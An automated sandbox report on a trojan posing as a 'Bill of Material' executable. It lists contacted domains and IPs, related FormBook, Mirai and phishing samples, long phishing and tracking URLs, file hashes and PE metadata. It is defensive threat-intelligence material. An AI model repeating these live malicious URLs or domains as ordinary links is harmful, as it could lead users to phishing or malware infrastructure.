https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/feed/ | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tadalaturbo.online | GQXHQykfhUHHi.exe, 00000007.00000002.4654251110.000000000577C000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4 | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.redhat.com/docs/manuals/enterprise/ | rasdial.exe, 00000006.00000002.4653099996.0000000005C42000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004192000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://wordpress.org/ | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.hostgator.com.br | rasdial.exe, 00000006.00000002.4653099996.0000000006740000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004C90000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1 | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://mgmasistencia.com/xmlrpc.php?rsd | rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.xforum.tech/647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox54 | GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004000000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.redhat.com/ | GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004192000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://anaidittrich.com/qpwk/?mV=ZpN4DLSXOzy8qX&Xn70_=Pn8OF1j/flre3VeYQ8gIXKcN0tGdbcqXadgaNymjhjlyVv | rasdial.exe, 00000006.00000002.4653099996.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004648000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
176.57.64.102 | www.ayypromo.shop | Bosnia and Herzegowina | 47959 | TELINEABA | false
162.55.254.209 | www.anaidittrich.com | United States | 35893 | ACPCA | false
167.172.133.32 | www.onlytradez.club | United States | 14061 | DIGITALOCEAN-ASNUS | false
18.183.3.45 | www.cannulafactory.top | United States | 16509 | AMAZON-02US | false
103.224.182.242 | www.xforum.tech | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | false
192.185.211.122 | tadalaturbo.online | United States | 46606 | UNIFIEDLAYER-AS-1US | false
206.119.82.116 | 32wxd.top | United States | 174 | COGENT-174US | false
172.67.215.136 | www.jiyitf.top | United States | 13335 | CLOUDFLARENETUS | false
85.13.151.9 | www.datensicherung.email | Germany | 34788 | NMM-ASD-02742FriedersdorfHauptstrasse68DE | false
194.233.65.154 | weep.site | Germany | 6659 | NEXINTO-DE | false
45.157.69.194 | www.88nn.pro | Germany | 136933 | GIGABITBANK-AS-APGigabitbankGlobalHK | false
66.29.149.180 | www.jaxo.xyz | United States | 19538 | ADVANTAGECOMUS | true
37.187.158.211 | fontanerourgente.net | France | 16276 | OVHFR | false
64.64.237.133 | gangli.ssywan.com | Canada | 25820 | IT7NETCA | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1497886
Start date and time: 2024-08-23 08:24:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Copy of 01. Bill of Material - 705.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@15/14
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 50
• Number of non-executed functions: 293
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:26:16 | API Interceptor | 10760789x Sleep call for process: rasdial.exe modified
                      | Match | Associated Sample Name / URL | Detection | Threat Name | Context |
                      | 176.57.64.102 | Pro#U015bba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | www.ayypromo.shop/mktg/ |
                      |  | TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | malicious | FormBook | www.ayypromo.shop/6ocx/ |
                      | 167.172.133.32 | RCZ-PI-4057.exe | malicious | FormBook | www.onlytradez.club/zctj/ |
                      |  | APS-0240226.exe | malicious | FormBook | www.onlytradez.club/zctj/ |
                      |  | Contract.exe | malicious | FormBook | www.onlytradez.club/h6ky/ |
                      |  | draft Proforma Invoice.exe | malicious | FormBook | www.onlytradez.club/h6ky/ |
                      | 18.183.3.45 | RCZ-PI-4057.exe | malicious | FormBook | www.cannulafactory.top/l90v/ |
                      |  | APS-0240226.exe | malicious | FormBook | www.cannulafactory.top/l90v/ |
                      |  | Pro#U015bba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | www.cannulafactory.top/y82c/ |
                      | 103.224.182.242 | Request for Quotation + sample catalog.vbs | malicious | FormBook | www.dzenis.tech/7vew/ |
                      |  | RFQ-230802024.PDF.exe | malicious | FormBook, PureLog Stealer | www.gareymods.online/mryt/?QdH=2/fVfIMzOSAeoDyOlvzPbcxg6uOGFlcTAjotXBf86BhX8b1Fvn8U/xngw4ZhOPlfqYGDhYZyjyNzd6+xk5CEn0+Odvi0gjY+Egu4sr9gIJMzfadynewUbfk=&oHf=JBV8 |
                      |  | Document 21824RXVPO.exe | malicious | FormBook, PureLog Stealer | www.dzenis.tech/c0n8/ |
                      |  | RCZ-PI-4057.exe | malicious | FormBook | www.xforum.tech/647x/ |
                      |  | Document_081924.exe | malicious | FormBook | www.dzenis.tech/c0n8/ |
                      |  | APS-0240226.exe | malicious | FormBook | www.xforum.tech/647x/ |
                      |  | Shipping document_pdf.exe | malicious | FormBook | www.xforum.tech/iyzv/ |
                      |  | New order.exe | malicious | FormBook | www.xforum.tech/iyzv/ |
                      |  | Document 240000807.exe | malicious | FormBook | www.dzenis.tech/c0n8/ |
                      |  | eqqjbbjMlt.elf | malicious | Unknown | connecticutwholesaler.com/wp-login.php |
                      | Match | Associated Sample Name / URL | Detection | Threat Name | Context |
                      | www.ayypromo.shop | Pro#U015bba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | 176.57.64.102 |
                      |  | TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | malicious | FormBook | 176.57.64.102 |
                      | www.jaxo.xyz | RCZ-PI-4057.exe | malicious | FormBook | 66.29.149.180 |
                      |  | APS-0240226.exe | malicious | FormBook | 66.29.149.180 |
                      | www.cannulafactory.top | RCZ-PI-4057.exe | malicious | FormBook | 18.183.3.45 |
                      |  | APS-0240226.exe | malicious | FormBook | 18.183.3.45 |
                      |  | Pro#U015bba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | 18.183.3.45 |
                      | www.xforum.tech | RCZ-PI-4057.exe | malicious | FormBook | 103.224.182.242 |
                      |  | APS-0240226.exe | malicious | FormBook | 103.224.182.242 |
                      |  | Shipping document_pdf.exe | malicious | FormBook | 103.224.182.242 |
                      |  | New order.exe | malicious | FormBook | 103.224.182.242 |
                      | Match | Associated Sample Name / URL | Detection | Threat Name | Context |
                      | DIGITALOCEAN-ASNUS | FedEx_AWB#53052032046.exe | malicious | Lokibot, PureLog Stealer | 104.248.205.66 |
                      |  | b684fa6621ac71f22449614bfe6064d3cc91fd7aeb3c8d16fb6d586947c85bc3_payload.exe | malicious | Lokibot | 104.248.205.66 |
                      |  | http://scratchpay.referralrock.com | malicious | Unknown | 157.245.80.197 |
                      |  | https://museocasasacantilado.org.mx/wp-includes/indexx.html#ZYnJlbmZyb3dAamVmZnBhcmlzaC5uZXQ | malicious | HTMLPhisher | 157.230.6.220 |
                      |  | sora.spc.elf | malicious | Unknown | 46.101.64.142 |
                      |  | https://emp.eduyield.com/el?aid=2hogdda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/bioesolutions.com/dayo2/xh7fh/V2FuZGEuSmVmZmVyaWVzQHVrcmkub3Jn$%C3%A3%E2%82%AC%E2%80%9A | malicious | HTMLPhisher | 134.122.77.153 |
                      |  | https://emp.eduyield.com/el?aid=2ok7dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/bioesolutions.com/dayo2/gqge4/SEwtRk9VLU9TU0BjZHdlLmNvbS50dw==$%C3%A3%E2%82%AC%E2%80%9A | malicious | HTMLPhisher | 134.122.77.153 |
                      |  | file.exe | malicious | MeshAgent | 104.248.229.104 |
                      |  | file.exe | malicious | MeshAgent | 104.248.229.104 |
                      |  | https://filegen.fortinet.com/v1/sandbox-file?file_name=windows.exe | malicious | EICAR | 192.241.205.137 |
                      |  | ACPCA022 0.10.htm | malicious | HTMLPhisher | 162.0.215.17 |
                      |  | QSFD.exe | malicious | FormBook | 162.0.213.94 |
                      |  | KKveTTgaAAsecNNaaaa.mpsl.elf | malicious | Unknown | 162.36.188.177 |
                      |  | S0fJap0SX1.lnk | malicious | Unknown | 162.55.247.247 |
                      |  | copia de pago.pdf.exe | malicious | DarkCloud | 162.55.60.2 |
                      |  | http://vztel.pgslotmx.com/4LzXXV15833BwEh1411pqqjcszogu14462TQIECUFXUJQCTZS286RSWC17492j17 | malicious | Unknown | 162.55.246.61 |
                      |  | http://pemeliharaan.akun.dana.freeappid.store/ | malicious | Unknown | 162.55.246.61 |
                      |  | SecuriteInfo.com.Linux.Siggen.9999.2027.4559.elf | malicious | Mirai | 162.56.153.145 |
                      |  | https://83677.com/qnXz3sMMb.html | malicious | Unknown | 162.55.4.52 |
                      |  | Botulismus56.exe | malicious | FormBook, GuLoader | 162.0.222.196 |
                      | TELINEABA | Pro#U015bba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | 176.57.64.102 |
                      |  | TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | malicious | FormBook | 176.57.64.102 |
                      |  | sKQrQ9KjPJ.elf | malicious | Mirai | 88.214.61.219 |
                      |  | KE4cyjDEDO.elf | malicious | Mirai | 88.214.61.224 |
                      |  | http://91.223.169.83 | malicious | Unknown | 91.223.169.83 |
                      |  | 2hUhvRdIqt.elf | malicious | Mirai | 88.214.61.255 |
                      |  | PkQB1rE5kK.elf | malicious | Mirai | 88.214.61.240 |
                      |  | mUZS5TqzCm.elf | malicious | Mirai | 45.93.94.133 |
                      |  | 5tuUOk0hKz.elf | malicious | Mirai | 88.214.61.216 |
                      |  | TggWCRH7SZ.elf | malicious | Mirai | 88.214.61.242 |
                      | AMAZON-02US | NF 7867-Voucher.ppam | malicious | RevengeRAT | 18.228.165.84 |
                      |  | https://l4vm89ff.r.us-west-2.awstrack.me/L0/https:%2F%2Fsnip.ly%2FFedExx/1/010101917bbe6db8-0435991f-93dd-44cd-b7b8-51bfd5cf53c7-000000/HIvKUOwubES5gbenLtlgHO_SzP8=389 | malicious | Unknown | 44.236.128.135 |
                      |  | Review_Aonoro.pdf | malicious | Unknown | 52.92.196.160 |
                      |  | https://email.mail.shpcfirm.com/c/eJxUk7uyur4CRp9Guzi5AaGwAARF9t7e8PKzcUJIJAoIgqA8_RmrM_-v_Va5Fq-qi06njHOLUYVAqpQBKEU24AwjQLhhKC4tm5BknE4VRYwzOpZTZGFKiGkwPM6mDEqk0oQrwyLCEBSbkJqJKVJBKEuxHOsphphChjGimEA0sRBOGGemaWAhCU9HFBZc55Mmq4TSz2IiHsU4n2ZtWzUj4oxwMMLBtcD9gCdKMzZRaXOXX2qEAym-p_OdW7zh0fgpleU-PKuk4XwTP-WVOJsCgbisZ1UZicMrudqnILjugcf7rh4yF1bzINM2TO51maW3f2azdXtwMl4GQGrZG0N7ivel723lLmw-4QWs3k9xrZ4CH6y_MI9k4PW9dy9uh-PBBmShV8sDOeGzPVs7dy6KLlLc29bqsZZdpKGOvYggr3yxrhHx0Aymrx59x89td7857nJv2HV4gcPO47jCj4Xrn56yQH7oM7mogYP-THjwryX0amv1l-Td6r6OeV5aLLILqxCBa77dY9T2-cqul7vNL1JZvNwm4rR3_PiMHs469F8980zf__fyRWonrMrkO1Q1zE7Cvv2hMjPmhdgmND1vAzfyz0IH-Vuud40fWDr_cS4P9pGbwzolWZ97Q1yHHvWOrhE9PzPkcX9nlgt83Gh0ur-Sn3Axd6_zUG3KXD5_X9H-aGMdtOcOz6XuhrvvoJ2Wm2WVGJvdp43vDZcIkJ_ZYJUZuxaxAodf7_1SSTy3FdbeYPImUNcRmY3LR6uVFrzVj_IrsyGwZEggYBkcAyoxAzaVFNiYMmFAiASH4yrnH_n84oKntmkxAUxKMKBcQMAVTAFPTBMzBUnC7PFzenvlWo4o_I-ijSzTS6uL_wdh2eNuiv8XAAD__xdyDpE | malicious | HTMLPhisher | 13.35.58.105 |
                      |  | http://url103.dignitycampaign.net/ls/click?upn=u001.Cas5ugePNtSf1mSWabrqo3mcJtdueilvOPTgzdlEpUd4GqCBNMVtW-2F-2F2wgGqCLpTN6dAfdijLlYq9iwquJXmE-2BZj79F37Z0CckED5TsG4fQ25o-2Fg-2FPDuwQBBWHkJ8RPrCF5saPUwaAjeZZiD8h-2FB9W48m4tIaN6GGErXkSFKFmDgBEYW1T7k-2FnXnvn8ldLi-2FIdfk0aRSirefRJxNUdOIGpZfncANcS7uFNatgOPxV2Ygm6fLOUWLotwEqsin4Y1CmtZ7BxfF5foNolE-2Boa25K-2B7wPI3V-2B767Ve4mOhPgJzLgSnGmthLVhWy6BYQf00QNI659fk8q12w02DBMlmMrw3khDr3cnNgYYng2Y5i7BXuipr6DyeGT98fM-2FKBVEQSrbKIquH3JWJaaXzReEynWFW3nTYFz4s5xNRnFU5AokDAcZstvVwxKq-2FJ1IjM1twMf6Hwg_J4YDns4pksLrb17hOXi2aOEwqj3m3dsJSi8gSl9zOoLhblODLjz6IKGTmKF92YKf5UEx9qOPJhvHxt6OvXPWhTIMtIICg1dYT0JxHA0xPVOIL6-2FatGunkes1VHfyRgkBTjXb0N8OIv5rbfThOrNJV8o4LJaaqlIOJB8KNeMcZLv1BO01a-2BZFPSvVNpAIaUaUnS-2BTtMnNrsqDBXNDQiQ2C60GIMOxXkEBDcUqmXWKAXHT2jyJKnE-2BTVX7Dn6v15EXXnFGV7DsBJuyOfxy4Jpp-2FDgxjoJYvwKKleeNMeZbnV7GSaFm53K3rrMP7FHypDrTj5gZolkQN74G665MiZOGOEsJpZBxGWUmRe5KD1lnqv9UsmS5oXGuT59ef-2B-2BOIJwozGuQ8LcLU9sq2bhaxr5QKojdGSLYHkQV48pY3diE-2FSKipsOxgeSp8hri35emljCrDJ8o2gvEcqTrgSbi5z9cBSKny1JK-2FAw-2B-2Bt5GdKd66pp3fqQXb-2FO03pmb7PSvgIGO-2BeUcgeDGkShCS6uwIbaWf92ZS-2BRnf-2BH4JXvcFqQFMHG6QluReLkOtpCzV5c3fz0XkA9GRQTJKj7LLrgRu3TEig-3D-3D | malicious | Unknown | 65.9.66.24 |
                      |  | Documentacao e embarque.ppam | malicious | RevengeRAT | 18.228.165.84 |
                      |  | gessner@mativ.com.html | malicious | HTMLPhisher | 13.52.156.46 |
                      |  | att001.htm | malicious | Unknown | 108.143.98.151 |
                      |  | hidakibest.arm4.elf | malicious | Gafgyt, Mirai | 13.60.64.14 |
                      |  | hidakibest.mpsl.elf | malicious | Gafgyt, Mirai | 13.60.64.14 |
                      Process:C:\Windows\SysWOW64\rasdial.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.1239949490932863
                      Encrypted:false
                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                      MD5:271D5F995996735B01672CF227C81C17
                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):286208
                      Entropy (8bit):7.9942073650031515
                      Encrypted:true
                      SSDEEP:6144:YxkBUCkgVVK7nZUcjM0Q10Ds+4KjZMBTzFl/r95IHluMN:YxkRg7nGyM0Qos+ZMtyuMN
                      MD5:9600EA162B57BF8F8B4DB5C90257F093
                      SHA1:2A2069393EFB940B849F9A949746D8EA37E58F64
                      SHA-256:7AB5F0B3B8F1E1D7D8AD48D9352C72D0A30185D65734F007A86F2D24E599468E
                      SHA-512:C0B9BF449B3625A93D3C5FECF7BA9A2C23955A45F52191A06BA225E04ACF9BECC153232ED5A1FF841EFC483248E069D8279570966B3CCE65D2F23F9CE87BD580
                      Malicious:false
                      Reputation:low
                      Preview:...d.CXOJ..S...w.QR...pLB...ZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67C.OJLFX.FE.0.g.Pz.b.'#?h7('"#X&f20XY,,o()h5/&e8Wk....Z,<*dAEM~HEQ9KFQ(7>.e/-.u'=.x1^.\....#?.P..f(".#..mVP..&)$u'=.EQ9KFQQ6g.XO.MIG....9KFQQ67C.OHMCFQHE.=KFQQ67CXOzYHGZXEQ9+BQQ6wCX_JLHEZHCQ9KFQQ61CXOJLHGZ(AQ9IFQQ67CZO..HGJHEA9KFQA67SXOJLHGJHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9Kh%4NCCXO^.LGZXEQ9.BQQ&7CXOJLHGZHEQ9KfQQV7CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJL
                      Process:C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):43568
                      Entropy (8bit):7.822289321002139
                      Encrypted:false
                      SSDEEP:768:yGdfijU9UwtZH7vE+Aj2F60EvOeLgVXVkM/ZlTCzOWncIPFwxL:Dxx/E+Q0s0Fz0cI9wxL
                      MD5:EE2187DC8692654D950020BE4F70F240
                      SHA1:D28C86EBE22CC8C4903492DFF725E9923901E2CD
                      SHA-256:1263FD8C5397643A1A5BDF5448413AE72E42DC5D3DCA5F50D0CB5560A43494E7
                      SHA-512:C7D9360CF325916D00918EF84E9AC5DEE2445EE7DD83E0774180AF78AF3F3B48A1DE1ACBA7CF82FE2C85DB166638E6FFE7175FB2C6C1FE75E1D355D7BFDB9DE0
                      Malicious:false
                      Reputation:low
                      Preview:EA06..P...(.y.*g5.L...6.P..Z..gP..).9.>m5..t....H.L.....3.P...<.aO.6f.9..3....*..qS...i...B..*s9.Zg0...@...g6..*3.\.iP..i.9..g4.M..I.Zg6...P.J.3..1............6qP..j....iW..*..d.eS.Lh39..g2..F.P.:.3.T...jg6.......3..fsZT.p..T..*..[6.M....$...7...*g6..)39.6g9...I.....M.5...3..(.9...EV.'*T.aX..).9....TVfs.l.iI.M)..d.gA.L..i....pQ@.*...N.o.!....3.T@(.,.kG..(.......L.u9....U@...b..x..J....dM*.9..g9..(......fL..J ..B.l..g6..*..P..T.M).9..g2.M.U...3.R.x....U.8j..z....5Y.......0...6.P@Q*... .ci....S(@.U,...!)`C,....l.*. ..6...N...S.E !....L..AE....L. I.&m2...eJ..f..x....3j......O.!..(.`Qfs:|.gI.L.@..X.B..) &P..E..@$...6..@W...mL.t...T.....*b.6..&...Nm6.......6....^..cN...S9..."..* ....).9...E..@....W..f.i..Y6....p.D....:.....O.?.b`.&...T....X....9......(.@.j......j...C.5.... ....q@!.0......J8....Qf.j\.mD...i.*m1..$U.$j..'.<..a...r.&......m3..j..Eh.....3 0.3....@.....P...&@.L...T0&..!...0...-.r...6d.jR./P.......U......P.l ..6..@*....!..%H...7.DH.Q3...T`......
                      Process:C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):286208
                      Entropy (8bit):7.9942073650031515
                      Encrypted:true
                      SSDEEP:6144:YxkBUCkgVVK7nZUcjM0Q10Ds+4KjZMBTzFl/r95IHluMN:YxkRg7nGyM0Qos+ZMtyuMN
                      MD5:9600EA162B57BF8F8B4DB5C90257F093
                      SHA1:2A2069393EFB940B849F9A949746D8EA37E58F64
                      SHA-256:7AB5F0B3B8F1E1D7D8AD48D9352C72D0A30185D65734F007A86F2D24E599468E
                      SHA-512:C0B9BF449B3625A93D3C5FECF7BA9A2C23955A45F52191A06BA225E04ACF9BECC153232ED5A1FF841EFC483248E069D8279570966B3CCE65D2F23F9CE87BD580
                      Malicious:false
                      Reputation:low
                      Preview:...d.CXOJ..S...w.QR...pLB...ZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67C.OJLFX.FE.0.g.Pz.b.'#?h7('"#X&f20XY,,o()h5/&e8Wk....Z,<*dAEM~HEQ9KFQ(7>.e/-.u'=.x1^.\....#?.P..f(".#..mVP..&)$u'=.EQ9KFQQ6g.XO.MIG....9KFQQ67C.OHMCFQHE.=KFQQ67CXOzYHGZXEQ9+BQQ6wCX_JLHEZHCQ9KFQQ61CXOJLHGZ(AQ9IFQQ67CZO..HGJHEA9KFQA67SXOJLHGJHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9Kh%4NCCXO^.LGZXEQ9.BQQ&7CXOJLHGZHEQ9KfQQV7CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJLHGZHEQ9KFQQ67CXOJL
                      Process:C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe
                      File Type:ASCII text, with very long lines (65536), with no line terminators
                      Category:dropped
                      Size (bytes):86022
                      Entropy (8bit):4.179101597380809
                      Encrypted:false
                      SSDEEP:1536:hGpoevM7eXGtdA2kxM8gAAeRiA6wKeQjXsDjRx:s9ZWfixiAP6dEv
                      MD5:236D13EAFB078725E5CACFE17C2273CD
                      SHA1:628515E753BA585221783A06BD17FE7B6DC50224
                      SHA-256:73E5716EDFB043BC7033817BECF4B5AF9AA8B5FDB052D23EE3EA38FD6EAF9C9A
                      SHA-512:5CCA7449BD9A9FBBA66835363F00CE565FB65E1697FEAF71AF0983DA62F2EE168DFF07B7983D6B992B6F39CA2CC5DF6848AE1BF2BC24E175818F56949ADBC17F
                      Malicious:false
                      Reputation:low
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.165519905979454
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:Copy of 01. Bill of Material - 705.exe
                      File size:1'247'232 bytes
                      MD5:806f72c900778deccf64f8a4ec8cdbc9
                      SHA1:d2bcb914eae4d432183d980ea19bee69f4b2d4fe
                      SHA256:642475685812ab7bbc355bb0012722266572aeadc8af18e4a4b0498229deb385
                      SHA512:95515bb78e021964efc1f0e7b17dd4721d76ab99ade61728eab4aeb2018842cb532028760e7145f1259215bcac0728d5a689b0ce7953bfb6267d40021550e45c
                      SSDEEP:24576:+qDEvCTbMWu7rQYlBQcBiT6rprG8ahZqIe30p:+TvC/MTQYxsWR7ahZBM0
                      TLSH:6C45CF037391D062FF9B91334B9AF6124BBC6A660123E51F13981DB9BE701B1563E7A3
                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                      Icon Hash:3a624e6e6ed8e28d
                      Entrypoint:0x420577
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66C7BE4F [Thu Aug 22 22:40:15 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
